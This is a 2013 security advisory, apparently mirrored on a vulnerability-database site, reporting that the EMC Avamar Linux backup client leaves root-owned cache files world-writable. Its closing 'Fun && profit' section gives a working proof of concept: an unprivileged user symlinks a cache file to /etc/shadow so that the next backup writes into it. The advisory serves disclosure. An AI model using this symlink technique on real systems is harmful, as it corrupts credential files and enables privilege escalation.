Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28913
HistoryJan 02, 2013 - 12:00 a.m.

EMC Avamar: World writable cache files

2013-01-0200:00:00
vulners.com
21
JSON

Product: Avamar backup client for Linux (Proberly also Unix but not tested)
Vendor: EMC (http://www.emc.com)
Tested version: 6.1.100-402 (Latest)
Vendor Notification: December 17, 2012
Vender Patch: None
Vender Workaround: <quote>workaround is to run a script at the end of each backup which set the files permissions to be read/write for the owner only</quote>
Vender Response: Will maybe be patched in version 7 mid-2013 since EMC does not patch for security
Solution Status: None
Risk Level: High

Details:

The avamar client runs as root and after each backup it leavs the cache files as world writable:

ls -latr /var/avamar/f_cache.dat

-rw-rw-rw- 1 root root 11534880 Dec 17 10:30 /var/avamar/f_cache.dat

ls -latr /var/avamar/p_cache.dat

-rw-rw-rw- 1 root root 3146272 Dec 17 10:30 /var/avamar/p_cache.dat

Fun && profit:

id

uid=1000(slave) gid=1000(slave) groups=1000(slave)

cd /var/avamar

ln -sf /etc/shadow p_cache.dat

and wait for the next backup window.

JSON